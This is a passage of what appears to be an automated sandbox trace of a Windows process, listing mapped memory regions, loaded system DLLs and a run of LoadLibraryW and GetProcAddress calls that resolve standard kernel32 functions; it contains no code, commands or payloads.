"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1714 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1715 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 1716 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1717 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1718 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1719 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1720 start_va = 0x1e20000 end_va = 0x221afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 1721 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1722 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1723 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1724 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1725 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1726 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1727 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1728 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1729 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1730 start_va = 0x2220000 end_va = 0x241cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1731 start_va = 0x2420000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1732 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1733 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1734 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1735 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1736 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1737 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1738 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1739 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1740 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1741 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1742 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1743 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1744 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1745 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1746 start_va = 0x7ffb26760000 end_va = 0x7ffb2677bfff monitored = 0 entry_point = 0x7ffb267631a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1747 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1748 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1749 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1750 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1751 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1752 start_va = 0x2220000 end_va = 0x2362fff monitored = 0 entry_point = 0x2248210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1753 start_va = 0x2410000 end_va = 0x241cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1754 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1755 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1756 start_va = 0x7ffb174f0000 end_va = 0x7ffb176a7fff monitored = 0 entry_point = 0x7ffb1755e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1757 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1758 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1759 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1760 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1761 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1762 start_va = 0x2220000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1763 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1764 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1765 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1766 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1767 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1768 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1769 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1770 start_va = 0x4b0000 end_va = 0x4c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1771 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1772 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1773 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1774 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1775 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1776 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1777 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1778 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1779 start_va = 0x2600000 end_va = 0x2936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1780 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1781 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1782 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1783 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1784 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1785 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1786 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1787 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1788 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1789 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1790 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1791 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1792 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1793 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1794 start_va = 0x20000 end_va = 0x27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1795 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1796 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1799 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1800 start_va = 0x4e0000 end_va = 0x51cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1801 start_va = 0x2940000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 1802 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1803 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1804 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1805 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1806 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1807 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1808 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1809 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1810 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1811 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1812 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1813 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1814 start_va = 0x2320000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1815 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1816 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1817 start_va = 0x2420000 end_va = 0x24fcfff monitored = 0 entry_point = 0x247e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1819 start_va = 0x2420000 end_va = 0x24fcfff monitored = 0 entry_point = 0x247e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1820 start_va = 0x2420000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1821 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1822 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1823 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1824 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Thread: id = 132 os_tid = 0xfac [0184.166] ResetEvent (hEvent=0x8) returned 1 [0184.166] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.232] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x7ffb26230000 [0184.232] ResetEvent (hEvent=0x8) returned 1 [0184.232] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.241] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetLastError") returned 0x7ffb2624b710 [0184.241] ResetEvent (hEvent=0x8) returned 1 [0184.241] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.243] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapFree") returned 0x7ffb2624b480 [0184.243] ResetEvent (hEvent=0x8) returned 1 [0184.243] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.246] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapSize") returned 0x7ffb28b1b780 [0184.246] ResetEvent (hEvent=0x8) returned 1 [0184.246] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.249] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0184.249] ResetEvent (hEvent=0x8) returned 1 [0184.249] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.252] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapAlloc") returned 0x7ffb28b252d0 [0184.252] ResetEvent (hEvent=0x8) returned 1 [0184.252] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.255] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0184.255] ResetEvent (hEvent=0x8) returned 1 [0184.255] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.258] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0184.258] ResetEvent (hEvent=0x8) returned 1 [0184.258] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.308] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrcpyA") returned 0x7ffb262545d0 [0184.308] ResetEvent (hEvent=0x8) returned 1 [0184.308] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0184.311] ResetEvent (hEvent=0x8) returned 1 [0184.311] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0184.314] ResetEvent (hEvent=0x8) returned 1 [0184.314] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.317] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0184.317] ResetEvent (hEvent=0x8) returned 1 [0184.317] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.320] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LocalFree") returned 0x7ffb2624dd10 [0184.320] ResetEvent (hEvent=0x8) returned 1 [0184.320] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.323] GetProcAddress (hModule=0x7ffb26230000, lpProcName="QueryFullProcessImageNameA") returned 0x7ffb26276410 [0184.323] ResetEvent (hEvent=0x8) returned 1 [0184.323] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.325] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileSize") returned 0x7ffb2625da90 [0184.325] ResetEvent (hEvent=0x8) returned 1 [0184.325] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.334] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenW") returned 0x7ffb2624d6d0 [0184.334] ResetEvent (hEvent=0x8) returned 1 [0184.334] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.336] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0184.336] ResetEvent (hEvent=0x8) returned 1 [0184.336] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.339] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetConsoleMode") returned 0x7ffb2625dfa0 [0184.339] ResetEvent (hEvent=0x8) returned 1 [0184.339] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.342] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetConsoleCP") returned 0x7ffb2625df90 [0184.342] ResetEvent (hEvent=0x8) returned 1 [0184.342] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.346] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WriteFile") returned 0x7ffb2625dcc0 [0184.346] ResetEvent (hEvent=0x8) returned 1 [0184.346] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.350] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlushFileBuffers") returned 0x7ffb2625d9d0 [0184.350] ResetEvent (hEvent=0x8) returned 1 [0184.350] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.356] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetStdHandle") returned 0x7ffb26257190 [0184.356] ResetEvent (hEvent=0x8) returned 1 [0184.356] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.389] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetLastError") returned 0x7ffb2624b730 [0184.389] ResetEvent (hEvent=0x8) returned 1 [0184.389] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.394] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.394] ResetEvent (hEvent=0x8) returned 1 [0184.394] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.398] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryA") returned 0x7ffb262574d0 [0184.398] ResetEvent (hEvent=0x8) returned 1 [0184.398] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.401] GetProcAddress (hModule=0x7ffb26230000, 